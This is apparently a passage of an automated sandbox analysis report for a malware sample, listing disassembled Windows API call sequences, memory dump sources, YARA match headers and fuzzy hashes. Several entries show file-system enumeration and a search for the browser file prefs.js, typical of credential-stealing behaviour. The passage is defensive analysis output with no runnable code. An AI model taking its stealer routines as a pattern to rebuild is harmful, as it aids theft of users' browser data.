                                      • FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                      • FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction ID: 838f3d4b9aca469d24645bc8798263f46c75174758c5e8897a35c85a1cb03794
                                      • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction Fuzzy Hash: 0E6174B5950218ABDF20EFE0DD48FEA73BDFB49300F44858CA60A92144EB75A785CF91
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022DC15C
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 022DC1B4
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 022DC1CA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022DCA26
                                      • FindClose.KERNEL32(000000FF), ref: 022DCA38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction ID: df2c3f7d76acebd9c2e68c4959fda1890492afc756ecd3781b1ef0ee8e86c9a9
                                      • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction Fuzzy Hash: BA420F72A20304ABCF14FBE4DD95EFD737AAB94300F804559A50BA6198EF349B48DF91
                                      APIs
                                      • wsprintfA.USER32 ref: 00413EC3
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                      • FindClose.KERNEL32(000000FF), ref: 00414081
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: ee542d5114ce319572a734a5905d40e323a44990baf9728e3ccc04902c83c687
                                      • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                      • Opcode Fuzzy Hash: ee542d5114ce319572a734a5905d40e323a44990baf9728e3ccc04902c83c687
                                      • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
                                      • wsprintfA.USER32 ref: 022E480D
                                      • FindFirstFileA.KERNEL32(?,?), ref: 022E4824
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022E4852
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022E4868
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022E48F2
                                      • FindClose.KERNEL32(000000FF), ref: 022E4907
                                      • lstrcat.KERNEL32(?,0064A524), ref: 022E492C
                                      • lstrcat.KERNEL32(?,0064A22C), ref: 022E493F
                                      • lstrlen.KERNEL32(?), ref: 022E494C
                                      • lstrlen.KERNEL32(?), ref: 022E495D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID:
                                      • API String ID: 671575355-0
                                      • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction ID: f81b566ba7c6c0ce209fa75edb4fb1f2668fc2caa8d57bb3833e0d5d236d5231
                                      • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction Fuzzy Hash: 415164B5590218ABDB24EBF0DD88FED737DAB58300F804588E64A96194EB749B84CF91
                                      APIs
                                      • wsprintfA.USER32 ref: 022E412A
                                      • FindFirstFileA.KERNEL32(?,?), ref: 022E4141
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022E416F
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022E4185
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022E42D3
                                      • FindClose.KERNEL32(000000FF), ref: 022E42E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction ID: 78c0d789e220c9b51374007d8883cbcc2a84244c651a21ddc6774845ccc9e87f
                                      • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction Fuzzy Hash: 265160B6910218ABCF24FBF0DD84EEA737DBB58300F40858CA64A96054EB759B85CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 0040ED3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                      • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: aaef0a01aba009eb9ef093bdee74fb80829dc0598d01aa172c0e8bd003938d0c
                                      • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                      • Opcode Fuzzy Hash: aaef0a01aba009eb9ef093bdee74fb80829dc0598d01aa172c0e8bd003938d0c
                                      • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                      • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: 4@$\*.*
                                      • API String ID: 2325840235-1993203227
                                      • Opcode ID: 40323c941dc43f3aa4a48a3986d26ca72e2a529551c594c10e828831c2f82050
                                      • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                      • Opcode Fuzzy Hash: 40323c941dc43f3aa4a48a3986d26ca72e2a529551c594c10e828831c2f82050
                                      • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                      • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: f5f4109695479c4be9dbbc3a317f05dd97d159bc4f1a5a6ce1e8ad3b9d7fb5b5
                                      • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                      • Opcode Fuzzy Hash: f5f4109695479c4be9dbbc3a317f05dd97d159bc4f1a5a6ce1e8ad3b9d7fb5b5
                                      • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                      • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                      • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                      • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                      • FindClose.KERNEL32(000000FF), ref: 00401E32
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 8b97a2c9a29bff876676fca5926e7f77c2165cdbe26687a25fa39450f0f85d83
                                      • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                      • Opcode Fuzzy Hash: 8b97a2c9a29bff876676fca5926e7f77c2165cdbe26687a25fa39450f0f85d83
                                      • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                      APIs
                                      • wsprintfA.USER32 ref: 022DEFA5
                                      • FindFirstFileA.KERNEL32(?,?), ref: 022DEFBC
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 022DF012
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 022DF028
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022DF515
                                      • FindClose.KERNEL32(000000FF), ref: 022DF52A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction ID: 8e03b5e54436ad303fc0043610b15a5ff9937c8a3b00a2ba99d05578d2f60643
                                      • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction Fuzzy Hash: A8E1DC729213189ADF58EBA4DD91EEE733AAF64300F8041DDA10B62195EF346BC9DF50
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                      • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: d1609602d4751f33da9c37f1768f1aa4302fa71f7c98392afc343a762dea85b7
                                      • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                      • Opcode Fuzzy Hash: d1609602d4751f33da9c37f1768f1aa4302fa71f7c98392afc343a762dea85b7
                                      • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022DDD52
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 022DDD9A
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 022DDDB0
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE033
                                      • FindClose.KERNEL32(000000FF), ref: 022DE045
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction ID: 9941f445295ef5382ed7860858ae350d260117f63b03bba7a040d7134d76ec0a
                                      • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction Fuzzy Hash: 4F9171729203049BCF14FBF4DD959FD737AAB95300F404658E80B96298EF389B189F91
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022DF985
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 022DF9D6
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 022DF9EC
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022DFD18
                                      • FindClose.KERNEL32(000000FF), ref: 022DFD2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction ID: f9fcf0aa570474f21502db070e27222cd3742d892e756a41d4cafcb42446bad5
                                      • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction Fuzzy Hash: 69B13F719203189BCF24EFA4DD95EEE737AAF94300F808199E40B56698EF345B48DF91
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*$@
                                      • API String ID: 433455689-2355794846
                                      • Opcode ID: f970a8509302eaf02035adbc7551205bfd23abb47e36f1cf4a831beee27c0276
                                      • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                      • Opcode Fuzzy Hash: f970a8509302eaf02035adbc7551205bfd23abb47e36f1cf4a831beee27c0276
                                      • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022D1B8A
                                      • StrCmpCA.SHLWAPI(?,0042526C), ref: 022D1BDA
                                      • StrCmpCA.SHLWAPI(?,00425314), ref: 022D1BF0
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022D1FA7
                                      • DeleteFileA.KERNEL32(00000000), ref: 022D2031
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022D2087
                                      • FindClose.KERNEL32(000000FF), ref: 022D2099
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID:
